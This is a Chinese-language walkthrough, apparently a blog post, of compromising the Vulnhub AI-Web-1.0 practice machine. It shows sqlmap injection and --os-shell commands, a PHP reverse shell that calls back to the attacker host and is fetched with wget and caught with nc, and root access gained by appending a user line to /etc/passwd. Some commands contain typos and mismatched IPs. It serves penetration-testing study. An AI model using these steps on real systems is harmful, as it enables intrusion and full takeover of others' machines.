Al-Web-1.0靶機滲透

                               Al-Web-1.0靶機滲透

前期准備：1.靶機下載網址：https://www.vulnhub.com/entry/ai-web-1,353/

                  2.滲透機 kali IP地址：192.168.75.128

環境配置：下載好虛擬機后使用VM打開，net連接模式

 

滲透開始：

1.授權

因為是自己下載搭建靶機進行滲透，所以此步省略

2.信息收集

2.1 收集目標IP地址

netdiscover

使用這條命令確定目標靶機IP地址

 

 可知，目標靶機IP地址為 192.168.75.134

 

因為靶機和滲透機是同在一個網段的，也可以使用

nmap -sP 192.168.75.0/24

　

 同樣也可掃描到目標靶機IP地址

 

2.2 收集目標開放端口和服務

nmap -A  IP地址

使用這條命令查看目標靶機開放的端口

 

   目標開放了80端口，開啟了http服務，並掃描出了目標的一些目錄

果斷訪問

 發現沒什么東西，只有這一句話，沒什么用

 

2.3 收集目標靶機網頁目錄

dirb http://目標IP地址

使用這條命令可以使用dirb爆破目標網頁目錄

 

 爆破出目標靶機網頁下有 index.html robots.txt  server-seatus 

 

依次訪問，最終在robots.txt中發現了兩個目錄

 

嘗試訪問/m3diNf0/，沒有權限。掃描/m3diNf0/目錄

 

 存在info.php文件，查看

 

 再次依次進行訪問，最后發現在/se3reTdir777/目錄下，存有一個輸入框

輸入萬能的SQL漏洞探測  ’  來判斷有無SQL注入漏洞

 

 

存在SQL注入漏洞，打開sqlmap進行數據庫爆破

 

打開burpsuite進行抓包

 

 成功抓取到數據包

 

嘗試用SQLmap跑一下注入點

sqlmap -u "http://172.16.1.195/se3reTdir777/" --data "uid=1&Operation=Submit"  --dbs

 

 爆破出兩個庫 aiweb1和information_schema

 

爆破aiweb1的表名

sqlmap -u "http://172.16.1.195/se3reTdir777/" --data "uid=1&Operation=Submit"  -D aiweb1 --tables

 

爆破出兩個表 user和systemUser

 

爆破user表里面的字段

sqlmap -u" http://192.168.75.134/se3reTdir777" --data 'uid=123&peration=Submit' -D aiweb1 -T user -columns

 

 發現並沒有我們想要的數據，尋找其他利用點

 

3.漏洞利用

嘗試使用SQLmap的--os-shell命令

　　os-shell執行條件有三個：

　　　　網站必須是root權限

　　　　網站的絕對路徑已知

　　　　GPC為off（php主動轉義的功能關閉）

 使用命令 

sqlmap -u" http://192.168.75.134/se3reTdir777" --data 'uid=123&peration=Submit' --os-shell

　　依次選擇 php  custom location(s)

根據前面找到的info.php文件暴露的信息，絕對路徑選擇：

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

 

成功圖如下

 但拿到的權限很低，需要進行提權

 

4.權限提升

成功后立馬在滲透機里面准備一個php文件，內容為

<?php
$sock=fsockopen("192.168.75.128",9966);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

（注意：這里的ip地址192.168.75.128是你的kali的ip，端口可以隨便寫，不要沖突就行，后面還要使用到，其他建議照抄）

開啟另外一個命令窗口，使用python搭建一個簡易服務器

 后面的5555為你上面創建的php文件中的端口

 

這時在瀏覽器中輸入127.0.0.1:端口號就可以看到你剛剛寫的文件了

 

然后回到我們sqlmap寫shell的那個界面

wget -S http://你本機的IP地址:你上面自己填寫的端口號/你上面寫的php文件名

　　

 

 下載完成

 有時候可能會出現這種情況，多試兩次就好了

 

然后換一個窗口，使用nc -lvp 9966監聽端口

 

回到我們sqlmap寫shell的那個界面，運行剛剛下載好的那個文件

 

 

 

正常情況下，這樣就運行成功了

 

 

 

 

可以用id，whoami等命令查看一些信息

 

 

但是這樣看並不舒服，可以使用python提升為交互式shell，也就是我們平常所看到的命令行窗口形式

python -c 'import pty;pty.spawn("/bin/bash")'

 

查看網站用戶權限，發現可以讀取passwd

 

 

增加一個root權限用戶，先對密碼進行加密

openssl passwd -1 -salt abc 000000

 

 然后再寫入自己創建的賬號和密碼

echo 'abc:$1$abc$yzqAxwzjwaO0BUFj9nRwF/:0:0::/root:/bin/bash'>>/etc/passwdsu

 

 

切換用戶  

su abc

　　

 

 至此，拿到管理員權限后，這台靶機就已經完全被破解了

 

 

后言：最近一直在學習，但是學習的東西很多很雜，於是便把自己的學習成果記錄下來，便利自己，幫助他人。希望本篇文章能對你有所幫助，有錯誤的地方，歡迎指出！！！